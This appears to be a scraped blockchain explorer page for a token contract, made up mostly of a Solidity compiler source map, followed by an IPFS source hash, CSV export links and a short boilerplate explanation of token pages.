:6;5101:2;5089:9;5080:7;5076:23;5072:32;5069:119;;;5107:79;;:::i;:::-;5069:119;5227:1;5252:61;5305:7;5296:6;5285:9;5281:22;5252:61;:::i;:::-;5242:71;;5198:125;4985:345;;;;:::o;5336:327::-;5394:6;5443:2;5431:9;5422:7;5418:23;5414:32;5411:119;;;5449:79;;:::i;:::-;5411:119;5569:1;5594:52;5638:7;5629:6;5618:9;5614:22;5594:52;:::i;:::-;5584:62;;5540:116;5336:327;;;;:::o;5669:349::-;5738:6;5787:2;5775:9;5766:7;5762:23;5758:32;5755:119;;;5793:79;;:::i;:::-;5755:119;5913:1;5938:63;5993:7;5984:6;5973:9;5969:22;5938:63;:::i;:::-;5928:73;;5884:127;5669:349;;;;:::o;6024:329::-;6083:6;6132:2;6120:9;6111:7;6107:23;6103:32;6100:119;;;6138:79;;:::i;:::-;6100:119;6258:1;6283:53;6328:7;6319:6;6308:9;6304:22;6283:53;:::i;:::-;6273:63;;6229:117;6024:329;;;;:::o;6359:118::-;6446:24;6464:5;6446:24;:::i;:::-;6441:3;6434:37;6359:118;;:::o;6483:109::-;6564:21;6579:5;6564:21;:::i;:::-;6559:3;6552:34;6483:109;;:::o;6598:360::-;6684:3;6712:38;6744:5;6712:38;:::i;:::-;6766:70;6829:6;6824:3;6766:70;:::i;:::-;6759:77;;6845:52;6890:6;6885:3;6878:4;6871:5;6867:16;6845:52;:::i;:::-;6922:29;6944:6;6922:29;:::i;:::-;6917:3;6913:39;6906:46;;6688:270;6598:360;;;;:::o;6964:195::-;7083:69;7146:5;7083:69;:::i;:::-;7078:3;7071:82;6964:195;;:::o;7165:364::-;7253:3;7281:39;7314:5;7281:39;:::i;:::-;7336:71;7400:6;7395:3;7336:71;:::i;:::-;7329:78;;7416:52;7461:6;7456:3;7449:4;7442:5;7438:16;7416:52;:::i;:::-;7493:29;7515:6;7493:29;:::i;:::-;7488:3;7484:39;7477:46;;7257:272;7165:364;;;;:::o;7535:377::-;7641:3;7669:39;7702:5;7669:39;:::i;:::-;7724:89;7806:6;7801:3;7724:89;:::i;:::-;7717:96;;7822:52;7867:6;7862:3;7855:4;7848:5;7844:16;7822:52;:::i;:::-;7899:6;7894:3;7890:16;7883:23;;7645:267;7535:377;;;;:::o;7918:400::-;8078:3;8099:84;8181:1;8176:3;8099:84;:::i;:::-;8092:91;;8192:93;8281:3;8192:93;:::i;:::-;8310:1;8305:3;8301:11;8294:18;;7918:400;;;:::o;8324:402::-;8484:3;8505:85;8587:2;8582:3;8505:85;:::i;:::-;8498:92;;8599:93;8688:3;8599:93;:::i;:::-;8717:2;8712:3;8708:12;8701:19;;8324:402;;;:::o;8732:118::-;8819:24;8837:5;8819:24;:::i;:::-;8814:3;8807:37;8732:118;;:::o;8856:807::-;9190:3;9212:148;9356:3;9212:148;:::i;:::-;9205:155;;9377:95;9468:3;9459:6;9377:95;:::i;:::-;9370:102;;9489:148;9633:3;9489:148;:::i;:::-;9482:155;;9654:3;9647:10;;8856:807;;;;:::o;9669:222::-;9762:4;9800:2;9789:9;9785:18;9777:26;;9813:71;9881:1;9870:9;9866:17;9857:6;9813:71;:::i;:::-;9669:222;;;;:::o;9897:332::-;10018:4;10056:2;10045:9;10041:18;10033:26;;10069:71;10137:1;10126:9;10122:17;10113:6;10069:71;:::i;:::-;10150:72;10218:2;10207:9;10203:18;10194:6;10150:72;:::i;:::-;9897:332;;;;;:::o;10235:640::-;10430:4;10468:3;10457:9;10453:19;10445:27;;10482:71;10550:1;10539:9;10535:17;10526:6;10482:71;:::i;:::-;10563:72;10631:2;10620:9;10616:18;10607:6;10563:72;:::i;:::-;10645;10713:2;10702:9;10698:18;10689:6;10645:72;:::i;:::-;10764:9;10758:4;10754:20;10749:2;10738:9;10734:18;10727:48;10792:76;10863:4;10854:6;10792:76;:::i;:::-;10784:84;;10235:640;;;;;;;:::o;10881:210::-;10968:4;11006:2;10995:9;10991:18;10983:26;;11019:65;11081:1;11070:9;11066:17;11057:6;11019:65;:::i;:::-;10881:210;;;;:::o;11097:286::-;11222:4;11260:2;11249:9;11245:18;11237:26;;11273:103;11373:1;11362:9;11358:17;11349:6;11273:103;:::i;:::-;11097:286;;;;:::o;11389:313::-;11502:4;11540:2;11529:9;11525:18;11517:26;;11589:9;11583:4;11579:20;11575:1;11564:9;11560:17;11553:47;11617:78;11690:4;11681:6;11617:78;:::i;:::-;11609:86;;11389:313;;;;:::o;11708:222::-;11801:4;11839:2;11828:9;11824:18;11816:26;;11852:71;11920:1;11909:9;11905:17;11896:6;11852:71;:::i;:::-;11708:222;;;;:::o;11936:129::-;11970:6;11997:20;;:::i;:::-;11987:30;;12026:33;12054:4;12046:6;12026:33;:::i;:::-;11936:129;;;:::o;12071:75::-;12104:6;12137:2;12131:9;12121:19;;12071:75;:::o;12152:307::-;12213:4;12303:18;12295:6;12292:30;12289:56;;;12325:18;;:::i;:::-;12289:56;12363:29;12385:6;12363:29;:::i;:::-;12355:37;;12447:4;12441;12437:15;12429:23;;12152:307;;;:::o;12465:98::-;12516:6;12550:5;12544:12;12534:22;;12465:98;;;:::o;12569:99::-;12621:6;12655:5;12649:12;12639:22;;12569:99;;;:::o;12674:168::-;12757:11;12791:6;12786:3;12779:19;12831:4;12826:3;12822:14;12807:29;;12674:168;;;;:::o;12848:169::-;12932:11;12966:6;12961:3;12954:19;13006:4;13001:3;12997:14;12982:29;;12848:169;;;;:::o;13023:148::-;13125:11;13162:3;13147:18;;13023:148;;;;:::o;13177:305::-;13217:3;13236:20;13254:1;13236:20;:::i;:::-;13231:25;;13270:20;13288:1;13270:20;:::i;:::-;13265:25;;13424:1;13356:66;13352:74;13349:1;13346:81;13343:107;;;13430:18;;:::i;:::-;13343:107;13474:1;13471;13467:9;13460:16;;13177:305;;;;:::o;13488:185::-;13528:1;13545:20;13563:1;13545:20;:::i;:::-;13540:25;;13579:20;13597:1;13579:20;:::i;:::-;13574:25;;13618:1;13608:35;;13623:18;;:::i;:::-;13608:35;13665:1;13662;13658:9;13653:14;;13488:185;;;;:::o;13679:348::-;13719:7;13742:20;13760:1;13742:20;:::i;:::-;13737:25;;13776:20;13794:1;13776:20;:::i;:::-;13771:25;;13964:1;13896:66;13892:74;13889:1;13886:81;13881:1;13874:9;13867:17;13863:105;13860:131;;;13971:18;;:::i;:::-;13860:131;14019:1;14016;14012:9;14001:20;;13679:348;;;;:::o;14033:191::-;14073:4;14093:20;14111:1;14093:20;:::i;:::-;14088:25;;14127:20;14145:1;14127:20;:::i;:::-;14122:25;;14166:1;14163;14160:8;14157:34;;;14171:18;;:::i;:::-;14157:34;14216:1;14213;14209:9;14201:17;;14033:191;;;;:::o;14230:96::-;14267:7;14296:24;14314:5;14296:24;:::i;:::-;14285:35;;14230:96;;;:::o;14332:90::-;14366:7;14409:5;14402:13;14395:21;14384:32;;14332:90;;;:::o;14428:149::-;14464:7;14504:66;14497:5;14493:78;14482:89;;14428:149;;;:::o;14583:126::-;14620:7;14660:42;14653:5;14649:54;14638:65;;14583:126;;;:::o;14715:77::-;14752:7;14781:5;14770:16;;14715:77;;;:::o;14798:158::-;14880:9;14913:37;14944:5;14913:37;:::i;:::-;14900:50;;14798:158;;;:::o;14962:126::-;15012:9;15045:37;15076:5;15045:37;:::i;:::-;15032:50;;14962:126;;;:::o;15094:113::-;15144:9;15177:24;15195:5;15177:24;:::i;:::-;15164:37;;15094:113;;;:::o;15213:154::-;15297:6;15292:3;15287;15274:30;15359:1;15350:6;15345:3;15341:16;15334:27;15213:154;;;:::o;15373:307::-;15441:1;15451:113;15465:6;15462:1;15459:13;15451:113;;;15550:1;15545:3;15541:11;15535:18;15531:1;15526:3;15522:11;15515:39;15487:2;15484:1;15480:10;15475:15;;15451:113;;;15582:6;15579:1;15576:13;15573:101;;;15662:1;15653:6;15648:3;15644:16;15637:27;15573:101;15422:258;15373:307;;;:::o;15686:320::-;15730:6;15767:1;15761:4;15757:12;15747:22;;15814:1;15808:4;15804:12;15835:18;15825:81;;15891:4;15883:6;15879:17;15869:27;;15825:81;15953:2;15945:6;15942:14;15922:18;15919:38;15916:84;;;15972:18;;:::i;:::-;15916:84;15737:269;15686:320;;;:::o;16012:281::-;16095:27;16117:4;16095:27;:::i;:::-;16087:6;16083:40;16225:6;16213:10;16210:22;16189:18;16177:10;16174:34;16171:62;16168:88;;;16236:18;;:::i;:::-;16168:88;16276:10;16272:2;16265:22;16055:238;16012:281;;:::o;16299:233::-;16338:3;16361:24;16379:5;16361:24;:::i;:::-;16352:33;;16407:66;16400:5;16397:77;16394:103;;;16477:18;;:::i;:::-;16394:103;16524:1;16517:5;16513:13;16506:20;;16299:233;;;:::o;16538:180::-;16586:77;16583:1;16576:88;16683:4;16680:1;16673:15;16707:4;16704:1;16697:15;16724:180;16772:77;16769:1;16762:88;16869:4;16866:1;16859:15;16893:4;16890:1;16883:15;16910:180;16958:77;16955:1;16948:88;17055:4;17052:1;17045:15;17079:4;17076:1;17069:15;17096:180;17144:77;17141:1;17134:88;17241:4;17238:1;17231:15;17265:4;17262:1;17255:15;17282:117;17391:1;17388;17381:12;17405:117;17514:1;17511;17504:12;17528:117;17637:1;17634;17627:12;17651:117;17760:1;17757;17750:12;17774:102;17815:6;17866:2;17862:7;17857:2;17850:5;17846:14;17842:28;17832:38;;17774:102;;;:::o;17882:155::-;18022:7;18018:1;18010:6;18006:14;17999:31;17882:155;:::o;18043:303::-;18183:34;18179:1;18171:6;18167:14;18160:58;18256:34;18251:2;18243:6;18239:15;18232:59;18329:5;18324:2;18316:6;18312:15;18305:30;18043:303;:::o;18356:130::-;18433:24;18451:5;18433:24;:::i;:::-;18426:5;18423:35;18413:63;;18472:1;18469;18462:12;18413:63;18356:130;:::o;18496:124::-;18570:21;18585:5;18570:21;:::i;:::-;18563:5;18560:32;18550:60;;18606:1;18603;18596:12;18550:60;18496:124;:::o;18630:128::-;18706:23;18723:5;18706:23;:::i;:::-;18699:5;18696:34;18686:62;;18744:1;18741;18734:12;18686:62;18630:128;:::o;18768:130::-;18845:24;18863:5;18845:24;:::i;:::-;18838:5;18835:35;18825:63;;18884:1;18881;18874:12;18825:63;18768:130;:::o

Swarm Source

ipfs://b8d12c63dff95380f85be79482367f20675a0fe9d2356fd8b35128cfd80fb07d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.